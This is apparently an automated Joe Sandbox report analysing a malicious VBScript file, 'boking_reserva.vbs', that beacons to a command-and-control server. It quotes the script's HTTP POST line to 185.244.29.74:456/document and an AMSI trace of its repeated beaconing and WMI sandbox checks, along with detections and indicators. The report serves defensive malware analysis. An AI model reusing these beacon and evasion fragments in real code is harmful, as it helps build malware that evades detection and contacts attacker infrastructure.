Edit tour

Windows Analysis Report
boking_reserva.vbs

Overview

General Information

Sample name:	boking_reserva.vbs
Analysis ID:	1523399
MD5:	6f8754b579376036b8fdaab9de8db283
SHA1:	bd1e0f525fc8999ce95e17a3ef4cf17de6d1e7be
SHA256:	abf22ba8a61b3bff907f60b92713e03a09e2607fb5b56e05723149f2108f8871
Tags:	185-244-29-74vbsuser-JAMESWT_MHT
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

System process connects to network (likely due to code injection or exploit)

VBScript performs obfuscated calls to suspicious functions

AI detected suspicious sample

Potential malicious VBS script found (has network functionality)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: WScript or CScript Dropper

Uses known network protocols on non-standard ports

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Detected TCP or UDP traffic on non-standard ports

Found URL in obfuscated visual basic script code

Found WSH timer for Javascript or VBS script (likely evasive script)

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

Program does not show much activity (idle)

Sigma detected: Script Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

Process Tree

System is w10x64

wscript.exe (PID: 5828 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cleanup

Sigma Signatures

System Summary

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 185.244.29.74, DestinationIsIpv6: false, DestinationPort: 456, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5828, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs", ProcessId: 5828, ProcessName: wscript.exe

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 185.244.29.74, DestinationIsIpv6: false, DestinationPort: 456, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5828, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs", ProcessId: 5828, ProcessName: wscript.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.1% probability

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 185.244.29.74 456

Jump to behavior

Potential malicious VBS script found (has network functionality)

Source:

Initial file: xx.open "POST", "http://185.244.29.74:456/document", False:xx.setrequestheader "User-Agent", gg:xx.send

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 456

Source: global traffic

TCP traffic: 192.168.2.7:49699 -> 185.244.29.74:456

Source: boking_reserva.vbs	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: boking_reserva.vbs	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4

Source: Joe Sandbox View

ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG

Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74

Source: unknown

HTTP traffic detected: POST /document HTTP/1.1Accept: */*User-Agent: B81A4609Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.244.29.74:456Content-Length: 0Connection: Keep-AliveCache-Control: no-cache

Source: wscript.exe, 00000000.00000002.3722607572.0000020DA68B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238956045.0000020DA85E4000.00000004.00000020.00020000.00000000.sdmp, boking_reserva.vbs	String found in binary or memory: http://185.244.29.74:456/document
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/document&
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/document0
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/document609
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentEncoding:
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documenta
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentcept-Encoding:
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentd
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentf
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documenti
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentj
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentn
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior

Source: boking_reserva.vbs

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal84.troj.evad.winVBS@1/0@0/1

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs"

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 456

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW\
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9312000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 185.244.29.74 456

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	231 Scripting	Valid Accounts	1 Windows Management Instrumentation	231 Scripting	1 Process Injection	1 Process Injection	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	11 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 DLL Side-Loading	LSASS Memory	2 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Name	Malicious	Antivirus Detection	Reputation
http://185.244.29.74:456/document	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://185.244.29.74:456/documenta	wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.244.29.74:456/documentd	wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.244.29.74:456/document&	wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.244.29.74:456/documentf	wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.244.29.74:456/documentj	wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.244.29.74:456/documentEncoding:	wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.244.29.74:456/documenti	wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.244.29.74:456/documentn	wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.244.29.74:456/document609	wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.244.29.74:456/document0	wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.244.29.74:456/documentcept-Encoding:	wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.244.29.74	unknown	Netherlands		209623	DAVID_CRAIGGG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523399
Start date and time:	2024-10-01 15:17:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	boking_reserva.vbs
Detection:	MAL
Classification:	mal84.troj.evad.winVBS@1/0@0/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .vbs Override analysis time to 240s for JS/VBS files not yet terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: boking_reserva.vbs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.244.29.74	Passport.vbs	Get hash	malicious	Unknown	Browse	185.244.29.74:456/document

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DAVID_CRAIGGG	Passport.vbs	Get hash	malicious	Unknown	Browse	185.244.29.74
